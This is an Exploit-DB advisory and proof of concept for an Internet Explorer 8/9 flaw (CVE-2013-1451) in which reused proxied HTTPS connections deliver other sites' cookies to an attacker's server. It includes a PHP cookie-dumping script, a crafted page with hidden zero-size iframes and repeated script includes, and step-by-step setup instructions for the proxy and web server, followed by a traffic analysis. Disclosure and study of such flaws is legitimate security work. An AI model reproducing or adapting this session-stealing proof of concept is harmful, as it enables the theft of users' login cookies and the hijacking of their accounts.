Microsoft Internet Explorer 8/9 – Steal Any Cookie

• Exploit Database
• 38 阅读

• 作者： Christian Haider
  日期： 2013-01-28
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/24432/

• # Exploit Title: Internet Explorer 8 & Internet Explorer 9 steal any Cookie
  # Date: 27.01.2013
  # Exploit Author: Christian Haider; Email: christian.haider.poc @ gmail
  *dot* com; linkedin: http://www.linkedin.com/in/chrishaider
  # Category: remote
  # Vendor Homepage: http://www.microsoft.com
  # Version: IE 8, IE 9
  # Tested on: Windows 7, Windows XP
  # CVE : CVE-2013-1451
  Disclaimer
  ----------
  The information in this advisory and any of its demonstrations is provided
  "as is" without any warranty of any kind. I am not liable for any direct or
  indirect damages caused as a result of using the information or
  demonstrations provided in any part of this advisory. Educational use
  only..!!
  ----------
  
  This vulnerability regarding Internet Explorer 8 & 9 was reported to
  Microsoft in December 2011 (ID is [12096gd]). Although the vulnerability
  can be used to steal cookies it has not been rated as a high risk
  vulnerability. As a consequence of that we will never see an update for IE
  8 & IE 9 and rather have to wait for a fix in IE 10. Only requirement for a
  successful exploit is that IE uses the same proxy for HTTP and HTTPS.
  I consider this a high risk vulnerability and a simple configuration change
  could mitigate the risk. To make the public aware of this threat I made
  this vulnerability public.
  CVE-ID has not been issued yet.
  Vulnerability discovered by: Christian Haider; Email: christian.haider.poc
  @ gmail *dot* com
  Linkedin: http://www.linkedin.com/in/chrishaider
  
  PoC Video on Youtube = http://www.youtube.com/watch?v=TPqagWAvo8U
  PoC Files:
  - info.php = http://pastebin.com/download.php?i=bPDDwJY4
  
  <?php
  print_r($_SERVER['HTTP_HOST']);
  echo '<br/>';
  // A way to view all cookies
  //print_r($_COOKIE);
  $cookie=$_COOKIE;
   
  foreach ($cookie as $key=>$val)
   echo "$key--> HIDDEN;	";
   ?>
  
   ?> 
  
  - video.html = http://pastebin.com/download.php?i=KXYX3pv1
  
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
  <title>Vul Test</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  </head>
  
  	<body>
  <form name="input" action="http://www.facebook.com/info.php" method="post">
  Facebook.com
  <input type="submit" value="Submit">
  </form>
  <form name="input" action="http://www.google.com/info.php" method="post">
  Google.com
  <input type="submit" value="Submit">
  </form>
  <form name="input" action="https://www.google.com" method="get">
  https://www.google.com
  <input type="submit" value="Submit">
  </form>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  <script type="text/javascript" src="https://web02.local.home:8080/script.js"></script>
  
  
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe> 
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  <iframe src="https://web02.local.home:8080/info.php" width="0" height="0"></iframe>
  
  <br/>
  
  <iframe src="http://www.facebook.com/info.php" width="900" height="100"></iframe>
  <br/>
  <iframe src="http://www.google.com/info.php" width="900" height="100"></iframe>
  <br/>
  <iframe src="http://www.linkedin.com/info.php" width="900" height="100"></iframe>
  <br/>
  <iframe src="http://account.live.com/info.php" width="900" height="100"></iframe>
  <br/>
  <iframe src="http://www.dropbox.com/info.php" width="900" height="100"></iframe>
  
  	
  	</body>
  </html>
  	
  - script.js (empty file)
  
  Timeline:
  Discovered (12.12.2011)
  Reported to Vendor (16.12.2011)
  Confirmed by Vendor (09.01.2012)
  Proof of Concept (27.01.2013)
  Made Public (28.01.2013)
  
  
  After a short walkthrough of the setup I will demonstrate the result.
  1. Install a proxy server of your choice. We use squid for now.
  2. Install a webserver. We use apache for now.
  a. Make the webserver listen for http traffic on port 80
  b. Make the webserver listen for https traffic on the same port as the
  proxy does. In our example Squid works on 443
  
  3. Due to the lack of an approved certificate for our website we have to
  import the https certificate into our key store. If you got a public
  hostname and a certificate for than it this step is not necessary
  
  4. Let�s check that the client and the proxy resolve the hostnames to the
  correct IP addresses (web01.local.home, web02.local.home, www.google.com,
  www.facebook.com, and so on)
  
  5. Setup a website with lots of data to be fetched from our https website.
  The result is that lots of connections get established
  
  6. After that we request some data from the actual target website. In our
  example we use Facebook, linkedin, dropbox, �
  
  7. As you can see in our example we send all cookies to the wrong website
  and display the data using a php script. I do only show the names of the
  cookies instead of the actual data but be assured that the whole cookie
  gets sent
  
  8. This is not limited to external websites. Even cookies used inside a
  company can get stolen the very same way. Imagine you use SAML to
  authenticate to Office 365 or other SaaS products.
  
  9. This works out of the box with XP and apache. Windows 7 does include the
  hostname in each request and apache does check this field [RFC 6066].
  
  10. You have to customize and build apache to remove that check.
  Nevertheless the actual information was sent on Windows 7 as well. After
  all this check is carried out on the webserver.
  
  11. Let�s ping the proxy and do a single post so we can narrow in once we
  analyze the traffic
  
  12. One even scarier thing happens if you do the following. First open our
  special crafted website. Then move on to https://www.google.com; afterwards
  open another website like http://virusscan.jotti.org/info.php
  
  13. As you can see IE thinks it is connected securely but when you have a
  closer look than you will see that IE thinks it is connected to
  www.google.com but it ended up on our webserver
  
  14. Sometimes IE crashed once you close it after you played around with
  this website which might indicate that there are some loose references or
  other vulnerabilities you could exploit
  
  Analyze what happens:
  =====================
  
  How ends that data up being sent to the wrong webserver?
  First we have a look what our special crafted website looks like. You will
  see it is not that special.
  We have 3 forms with a submit button and several includes of script.js
  followed by several iframes of info.php;
  The last 5 iframes are to facebook, google, linkedin, and so on.
  What we expect IE to carry out:
  1. Get our crafted website
  2. Build https connection and download script.js from
  https://web01.local.home:8080
  3. Build https connection and download info.php from
  https://web01.local.home:8080
  4. Use a normal connection to download content from facebook, google,
  linkedin, and so on
  We use wireshark to have a look if that is true:
  1. We see the GET of our crafted website and the unencrypted traffic which
  says nothing has changed
  2. We see 12 connect for the 39 requests over https. That means we reuse
  the connections!
  3. Search for any other GET or POST which should be unencrypted --> There
  are no
  4. What happened to the requests? Let�s have a look at the very end. Right
  after we started the ping command, there should be a request
  5. It is tunneled over the https connection which ends at our crafted
  website
  Conclusion: After several connections are opened IE starts to reuse them.
  Unfortunately it seems that the proxy component of IE does not keep track
  of the actual target of the connections.
  This results in GET/POST REQUEST getting tunneled through an SSL connection
  to the wrong webserver.
  The proxy server does not even see what is going on within the SSL
  connection so there is nothing it could do to prevent it. This might be
  different if you scan inside of the SSL connection. RFC 6066 section 11.1
  specifies that web servers MUST check that the host header and host name
  sent via SNI match but does a proxy scan for such malfunction?